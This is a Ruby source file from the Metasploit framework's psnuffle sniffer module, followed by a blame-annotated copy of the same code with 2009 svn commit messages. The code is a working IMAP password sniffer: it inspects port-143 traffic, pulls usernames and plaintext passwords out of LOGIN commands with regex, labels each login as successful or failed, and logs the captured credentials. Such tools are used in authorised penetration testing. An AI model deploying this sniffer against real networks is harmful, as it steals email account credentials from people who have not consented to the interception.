metasploit-framework/data/exploits/psnuffle/imap.rb

# Psnuffle password sniffer add-on class for imap
# part of psnuffle sniffer auxiliary module
#
# When db is available reports go into db
# Also incorrect credentials are sniffed but marked
# as unsuccessful logins... (Typos are common :-) )
#


class SnifferIMAP < BaseProtocolParser

	def register_sigs
		self.sigs = {
			:banner		=> /^(\*\s+OK[^\n\r]*)/i,
			:login		=> /^CAPABILITY\s+LOGIN\s+([^\s]+)\s+([^\n\r]+)/i,
			:login_pass => /^CAPABILITY\s+OK\s+(Login[^\n\r]*)/i,
			:login_bad	=> /^CAPABILITY\s+BAD\s+(Login[^\n\r]*)/i,
			:login_fail => /^CAPABILITY\s+NO\s+(Login[^\n\r]*)/i
		}
	end

	def parse(pkt)

		# We want to return immediatly if we do not have a packet which is handled by us
		return if not pkt[:tcp]
		return if (pkt[:tcp].src_port != 143 and pkt[:tcp].dst_port != 143)
		s = find_session((pkt[:tcp].dst_port == 143) ? get_session_src(pkt) : get_session_dst(pkt))

		self.sigs.each_key do |k|
			# There is only one pattern per run to test
			matched = nil
			matches = nil

			if (pkt[:tcp].payload_data =~ self.sigs[k])
				matched = k
				matches = [$1,$2]
			end

			case matched
			when :banner
				s[:banner] = matches
				s[:name]   = "IMAP Server Welcome Banner: #{s[:banner]}"
				report_service(s)

			when :login_pass

				s[:proto]="imap4"
				s[:extra]="Sucessful Login. Banner: #{s[:banner]}"
				report_auth_info(s)
				print_status("Successful IMAP Login: #{s[:session]} >> #{s[:user]} / #{s[:pass]} (#{s[:banner].strip})")

				# Remove it form the session objects so freeup
				sessions.delete(s[:session])

			when :login_fail

				s[:proto]="imap4"
				s[:extra]="Failed Login. Banner: #{s[:banner]}"
				report_auth_info(s)
				print_status("Failed IMAP Login: #{s[:session]} >> #{s[:user]} / #{s[:pass]} (#{s[:banner].strip})")

				# Remove it form the session objects so freeup
				sessions.delete(s[:session])

			when :login_bad
				s[:proto]="imap4"
				s[:extra]="Failed Login. Banner: #{s[:banner]}"
				report_auth_info(s)
				print_status("Bad IMAP Login: #{s[:session]} >> #{s[:user]} / #{s[:pass]} (#{s[:banner].strip})")

				# Remove it form the session objects so freeup
				sessions.delete(s[:session])

			when :login
				s[:user]=$1
				s[:pass]=$2

			when nil
				# No matches, no saved state
			else
				sessions[s[:session]].merge!({k => matches})
			end # end case matched
		end # end of each_key
	end # end of parse
end
Updated pSnuffle sniffer code from _MAX_ git-svn-id: file:///home/svn/framework3/trunk@6965 4d416f70-5f16-0410-b530-b9f4589650da 2009-08-19 14:07:33 +00:00			`# Psnuffle password sniffer add-on class for imap`
			`# part of psnuffle sniffer auxiliary module`
			`#`
			`# When db is available reports go into db`
			`# Also incorrect credentials are sniffed but marked`
			`# as unsuccessful logins... (Typos are common :-) )`
			`#`


			`class SnifferIMAP < BaseProtocolParser`

			`def register_sigs`
			`self.sigs = {`
Fixes #423. Using /s on a regex forces an encoding that cant match random binary gibberish git-svn-id: file:///home/svn/framework3/trunk@7322 4d416f70-5f16-0410-b530-b9f4589650da 2009-11-02 17:59:45 +00:00			`:banner => /^(\\s+OK[^\n\r])/i,`
			`:login => /^CAPABILITY\s+LOGIN\s+([^\s]+)\s+([^\n\r]+)/i,`
			`:login_pass => /^CAPABILITY\s+OK\s+(Login[^\n\r]*)/i,`
			`:login_bad => /^CAPABILITY\s+BAD\s+(Login[^\n\r]*)/i,`
			`:login_fail => /^CAPABILITY\s+NO\s+(Login[^\n\r]*)/i`
Updated pSnuffle sniffer code from _MAX_ git-svn-id: file:///home/svn/framework3/trunk@6965 4d416f70-5f16-0410-b530-b9f4589650da 2009-08-19 14:07:33 +00:00			`}`
			`end`

			`def parse(pkt)`

			`# We want to return immediatly if we do not have a packet which is handled by us`
			`return if not pkt[:tcp]`
			`return if (pkt[:tcp].src_port != 143 and pkt[:tcp].dst_port != 143)`
			`s = find_session((pkt[:tcp].dst_port == 143) ? get_session_src(pkt) : get_session_dst(pkt))`

			`self.sigs.each_key do \|k\|`
			`# There is only one pattern per run to test`
			`matched = nil`
			`matches = nil`

			`if (pkt[:tcp].payload_data =~ self.sigs[k])`
			`matched = k`
			`matches = [$1,$2]`
			`end`

			`case matched`
			`when :banner`
Fixes #423. Using /s on a regex forces an encoding that cant match random binary gibberish git-svn-id: file:///home/svn/framework3/trunk@7322 4d416f70-5f16-0410-b530-b9f4589650da 2009-11-02 17:59:45 +00:00			`s[:banner] = matches`
Updated pSnuffle sniffer code from _MAX_ git-svn-id: file:///home/svn/framework3/trunk@6965 4d416f70-5f16-0410-b530-b9f4589650da 2009-08-19 14:07:33 +00:00			`s[:name] = "IMAP Server Welcome Banner: #{s[:banner]}"`
			`report_service(s)`

			`when :login_pass`

			`s[:proto]="imap4"`
Fixes #423. Using /s on a regex forces an encoding that cant match random binary gibberish git-svn-id: file:///home/svn/framework3/trunk@7322 4d416f70-5f16-0410-b530-b9f4589650da 2009-11-02 17:59:45 +00:00			`s[:extra]="Sucessful Login. Banner: #{s[:banner]}"`
Updated pSnuffle sniffer code from _MAX_ git-svn-id: file:///home/svn/framework3/trunk@6965 4d416f70-5f16-0410-b530-b9f4589650da 2009-08-19 14:07:33 +00:00			`report_auth_info(s)`
			`print_status("Successful IMAP Login: #{s[:session]} >> #{s[:user]} / #{s[:pass]} (#{s[:banner].strip})")`

			`# Remove it form the session objects so freeup`
			`sessions.delete(s[:session])`
Fixes #423. Using /s on a regex forces an encoding that cant match random binary gibberish git-svn-id: file:///home/svn/framework3/trunk@7322 4d416f70-5f16-0410-b530-b9f4589650da 2009-11-02 17:59:45 +00:00
Updated pSnuffle sniffer code from _MAX_ git-svn-id: file:///home/svn/framework3/trunk@6965 4d416f70-5f16-0410-b530-b9f4589650da 2009-08-19 14:07:33 +00:00			`when :login_fail`

			`s[:proto]="imap4"`
Fixes #423. Using /s on a regex forces an encoding that cant match random binary gibberish git-svn-id: file:///home/svn/framework3/trunk@7322 4d416f70-5f16-0410-b530-b9f4589650da 2009-11-02 17:59:45 +00:00			`s[:extra]="Failed Login. Banner: #{s[:banner]}"`
Updated pSnuffle sniffer code from _MAX_ git-svn-id: file:///home/svn/framework3/trunk@6965 4d416f70-5f16-0410-b530-b9f4589650da 2009-08-19 14:07:33 +00:00			`report_auth_info(s)`
			`print_status("Failed IMAP Login: #{s[:session]} >> #{s[:user]} / #{s[:pass]} (#{s[:banner].strip})")`

			`# Remove it form the session objects so freeup`
			`sessions.delete(s[:session])`

			`when :login_bad`
			`s[:proto]="imap4"`
Fixes #423. Using /s on a regex forces an encoding that cant match random binary gibberish git-svn-id: file:///home/svn/framework3/trunk@7322 4d416f70-5f16-0410-b530-b9f4589650da 2009-11-02 17:59:45 +00:00			`s[:extra]="Failed Login. Banner: #{s[:banner]}"`
Updated pSnuffle sniffer code from _MAX_ git-svn-id: file:///home/svn/framework3/trunk@6965 4d416f70-5f16-0410-b530-b9f4589650da 2009-08-19 14:07:33 +00:00			`report_auth_info(s)`
			`print_status("Bad IMAP Login: #{s[:session]} >> #{s[:user]} / #{s[:pass]} (#{s[:banner].strip})")`

			`# Remove it form the session objects so freeup`
			`sessions.delete(s[:session])`

			`when :login`
			`s[:user]=$1`
			`s[:pass]=$2`

			`when nil`
			`# No matches, no saved state`
			`else`
			`sessions[s[:session]].merge!({k => matches})`
			`end # end case matched`
			`end # end of each_key`
			`end # end of parse`
			`end`
Fixes #423. Using /s on a regex forces an encoding that cant match random binary gibberish git-svn-id: file:///home/svn/framework3/trunk@7322 4d416f70-5f16-0410-b530-b9f4589650da 2009-11-02 17:59:45 +00:00